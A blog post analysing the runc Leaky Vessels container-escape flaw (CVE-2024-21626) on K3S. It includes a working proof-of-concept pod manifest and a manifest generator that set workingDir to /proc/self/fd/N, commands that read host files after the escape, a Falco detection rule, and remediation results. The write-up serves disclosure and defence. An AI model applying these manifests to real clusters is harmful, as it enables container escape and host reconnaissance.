Discussion about the Leaky Vessels security vulnerability on K3S
Category: security
Modified: Fri, 2024-Feb-09
Introduction
Recently, a container security vulnerability called Leaky Vessels (CVE-2024-21626) was disclosed that could lead to container escape. With this vulnerability, processes running inside a container may gain access to files on the host system. Several related CVEs affect runc, Docker, and BuildKit (CVE-2024-21626, CVE-2024-23651, CVE-2024-23652, and CVE-2024-23653). This article focuses on CVE-2024-21626, which affects the runc container runtime.
This vulnerability is caused by a file descriptor leak in the runc container runtime. Under specific conditions, or with a suitable exploit, attackers can leverage it to gain read access to the host file system, or even overwrite files on the host (this likely depends on whether the container runs as root).
When I heard about this vulnerability, most articles demonstrated how to exploit it on Docker systems (by creating and running a malicious container image). I tried another method to see whether the vulnerability also works on K3S. This is the first time I have seen a container escape vulnerability in real life.
Unpatched version of K3S is affected
K3S uses containerd, which in turn uses the runc runtime. Instead of creating a malicious container image, I set 'workingDir' in a pod definition to override the working directory. Below is an example:
---
apiVersion: v1
kind: Pod
metadata:
  name: leaky-vessels
spec:
  containers:
  - name: leaky-vessels
    image: docker.io/library/alpine:3.19
    workingDir: /proc/self/fd/9
    command: ["/bin/sh", "-c", "sleep infinity"]
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop:
        - ALL
      privileged: false
      runAsNonRoot: true
      runAsUser: 1000000000
      runAsGroup: 1000000000
      seccompProfile:
        type: RuntimeDefault
Here, several security measures are enabled for the container: the pod is not allowed to run as root, privilege escalation is disallowed, all Linux capabilities are dropped, and a seccomp profile is set. None of these measures prevents the Leaky Vessels attack on a vulnerable system.
Note that we did not create a malicious container image and then trick the owner into running it. We simply overrode the working directory of the pod to '/proc/self/fd/9'. Depending on the runc version, the working directory reportedly needs to be set to '/proc/self/fd/N', where N is between 1 and 10.
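Since the usable descriptor number varies by runc version, one manifest per candidate fd can be stamped out mechanically. Below is a minimal sketch; the pod and file names are illustrative, not from the original write-up:

```shell
# Generate one pod manifest per candidate fd (1..10); only the
# workingDir value and the pod name change between attempts.
for n in $(seq 1 10); do
  cat > "leaky-vessels-fd$n.yaml" <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: leaky-vessels-fd$n
spec:
  containers:
  - name: leaky-vessels
    image: docker.io/library/alpine:3.19
    workingDir: /proc/self/fd/$n
    command: ["/bin/sh", "-c", "sleep infinity"]
EOF
done
ls leaky-vessels-fd*.yaml
```

On a patched runtime these pods simply fail to start; on a vulnerable one, whichever fd number matches the leaked descriptor yields the escaped working directory.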
Once the pod is running, we log in to it:
$ kubectl exec -it pod/leaky-vessels -- /bin/sh
$ pwd
# This is container escaping
# We now have read access to the files on the host of the K3S system
$ cd ../../../etc
$ ls -l hostname
-rw-r--r-- 1 root root 17 Nov 11 2019 hostname
$ cat hostname
k3s-controller.internal
Voila! Once the attacker has escaped the container, even without write access, the attacker can do a lot. The attacker could:
- Read any file that is readable by the "others" permission bits, including but not limited to:
  - the current hostname of the host server
  - the OS and Linux distribution of the host server (etc/redhat-release)
  - the DNS resolver configuration of the host server
  - the RPM database of the host server (e.g. strings rpmdb.sqlite | grep src.rpm | sort), which tells the attacker what packages are installed on the host
- Access proc/net/route, which reveals the default gateway of the host
- Access proc/version, which reveals the kernel version and architecture of the host
- Access proc/PID/stat, which reveals some of the PIDs and process names that the host is running. For example:

  ls -1 */stat | xargs awk '{print $1 " " $2}' | sort -n -k 1
  # These are PIDs and the process names
  33907 (nginx)
  33908 (nginx)
  33909 (nginx)
  33910 (nginx)
  33911 (nginx)

Many of the process names of the host system are exposed.
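The read-only checks above can be condensed into a short script. This is a sketch rather than something from the original session; it hops to the host root via the leaked fd, falling back to / so it is also runnable on an ordinary host for illustration:

```shell
# Hop from the leaked fd to the host root; fall back to / so the
# sketch is also runnable on an ordinary host for illustration.
cd /proc/self/fd/9/../../.. 2>/dev/null || cd /
for f in etc/hostname etc/resolv.conf proc/version; do
  if [ -r "$f" ]; then
    echo "== $f"
    cat "$f"              # hostname, DNS resolvers, kernel version
  fi
done
# Default route: destination 00000000; the gateway column is
# little-endian hex (e.g. 0101A8C0 -> 192.168.1.1).
awk '$2 == "00000000" { print $1, $3 }' proc/net/route
```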
Below is a demonstration of the Leaky Vessels attack.
Detecting the Leaky Vessels vulnerability
Snyk released some eBPF-based detectors (static and dynamic). However, these detectors appear to be designed for runc (Docker-based) systems; they did not work for K3S in my testing.
We can use Falco to detect the vulnerability.
Here is the Falco rule (/etc/falco/rules.d/leaky-vessels.yaml) I used for this case:
---
- rule: Possible container escape attempt - Leaky Vessels
  desc: >
    Detect a container process that changes the current directory using a
    procfs file descriptor.
  condition: >
    ( container
      and evt.type = chdir
      and evt.dir = <
      and evt.rawres in (0, 1, 2)
      and evt.arg.path startswith "/proc/self/fd/" )
  output: >
    - Event time [%evt.datetime]
    - Possible container escape attempt detected.
    - Details
    evt.type=%evt.type
    evt.args=%evt.args
    evt.res=%evt.res
    proc.pid=%proc.pid proc.cwd=%proc.cwd
    proc.cmdline=%proc.cmdline proc.exepath=%proc.exepath
    proc.sid=%proc.sid
    proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline
    proc.vpid=%proc.vpid
    user.uid=%user.uid user.name=%user.name
    user.loginuid=%user.loginuid user.loginname=%user.loginname
    group.gid=%group.gid group.name=%group.name
    container.privileged=%container.privileged
    container.id=%container.id
    container.name=%container.name
    container.image=%container.image
    container.image.id=%container.image.id
    container_location=%container.image.repository:%container.image
    container.image.digest=%container.image.digest
    k8s.pod.name=%k8s.pod.name
  priority: WARNING
  tags: [host, container, cve-2024-21626]
The log below is written to syslog as a single line; to make it easier to read, I have split it into multiple lines.
Feb 7 09:22:09 k3s-controller falco[1157671]: 09:22:09.819887134:
Warning - Event time [2024-02-07 09:22:09.819887134]
- Possible container escape attempt detected.
- Details evt.type=chdir evt.args=res=0 path=/proc/self/fd/9
evt.res=SUCCESS proc.pid=1158172
proc.cwd=/proc/self/fd/9/ proc.cmdline=runc:[1:CHILD] init
proc.exepath=/data/container/rancher/k3s/data/3dfc950bd39d2e2b435291ab8c1333aa6051fcaf46325aee898819f3b99d4b21/bin/runc
proc.sid=99 proc.ppid=1158164
proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/k3s/containerd/io.containerd.runtime.v2.task/k8s.io/babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b/log.json --log-format json exec --process /tmp/runc-process1490844986 --console-socket /tmp/pty3871979753/pty.sock --detach --pid-file /run/k3s/containerd/io.containerd.runtime.v2.task/k8s.io/babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b/fcbbe128159780ff084f695701c87b38638eada0c896bfc75304a779df3ed5be.pid babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b
proc.vpid=99
user.uid=0 user.name=root user.loginuid=-1 user.loginname=<NA>
group.gid=0 group.name=root
container.privileged=<NA> container.id= container.name=<NA> container.image=<NA>
container.image.id=<NA> container_location=<NA>:<NA>
container.image.digest=<NA> k8s.pod.name=<NA>
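Rather than splitting such records by hand, the key=value tokens can be broken out with standard tools. A quick sketch (the sample line is abbreviated from the record above; values that themselves contain spaces, such as proc.cmdline, get split too, so this is only a viewing aid):

```shell
# Split a one-line Falco syslog record into one key=value pair per
# line; the sample line is abbreviated from the record shown above.
line='Warning - Possible container escape attempt detected. - Details evt.type=chdir evt.res=SUCCESS proc.pid=1158172 proc.cwd=/proc/self/fd/9/'
printf '%s\n' "$line" | tr ' ' '\n' | grep '='
# -> evt.type=chdir
#    evt.res=SUCCESS
#    proc.pid=1158172
#    proc.cwd=/proc/self/fd/9/
```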
Remediation and prevention
- Check with vendors and upgrade vulnerable systems to patched versions (e.g., runc, Docker, BuildKit, containerd, K3S, OpenShift, cloud service providers, etc.)
- According to previous readings and articles, Red Hat recommends configuring SELinux in enforcing mode so that these suspicious activities can be blocked
- Container sandboxing. I tried the same method (setting workingDir) with an older version of Google gVisor and with Kata Containers on an unpatched K3S. The workingDir method does not work under container sandboxing; these sandboxing techniques provide an isolated environment and reduce the attack surface.

  Result with Google gVisor:

  $ kubectl describe pod/leaky-vessels
  Name:          leaky-vessels
  Containers:
    leaky-vessels:
      Container ID:   containerd://d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a
      Image:          docker.io/library/alpine:3.19
      Command:
        /bin/sh
        -c
        sleep infinity
      State:          Waiting
        Reason:       CrashLoopBackOff
      Last State:     Terminated
        Reason:       StartError
        Message:      failed to start containerd task "d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a": OCI runtime start failed: starting container: starting sub-container [/bin/sh -c sleep infinity]: creating process: failed to find initial working directory "/proc/self/fd/9": invalid argument: unknown
        Exit Code:    128
      Ready:          False

  Result with Kata Containers:

  Name:          leaky-vessels
  Containers:
    leaky-vessels:
      Container ID:   containerd://b03df3a00fd9856d5f36bac3f346aba8451bd7814e8538d691da58d851c5b650
      Image:          docker.io/library/alpine:3.19
      Port:           <none>
      Host Port:      <none>
      Command:
        /bin/sh
        -c
        sleep infinity
      State:          Waiting
        Reason:       RunContainerError
      Last State:     Terminated
        Reason:       StartError
        Message:      failed to create containerd task: failed to create shim task: No such file or directory (os error 2): unknown
        Exit Code:    128
      Ready:          False
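For the upgrade point, the check can be scripted. A sketch, assuming runc 1.1.12 is the release containing the fix for CVE-2024-21626; the `have` value is a placeholder for the output of `runc --version`:

```shell
# Compare an installed runc version against the fixed release.
fixed="1.1.12"
have="1.1.10"   # placeholder; in practice: runc --version | awk 'NR==1 {print $3}'
# sort -V orders version strings numerically; if the older of the two
# is the fixed version, the installed runc already contains the fix.
oldest=$(printf '%s\n' "$fixed" "$have" | sort -V | head -n 1)
if [ "$oldest" = "$fixed" ]; then
  echo "runc $have: patched"
else
  echo "runc $have: vulnerable to CVE-2024-21626"
fi
# -> runc 1.1.10: vulnerable to CVE-2024-21626
```

Note that K3S bundles its own runc, so the binary under the K3S data directory (the proc.exepath in the Falco log above shows its location on this host) should be checked as well.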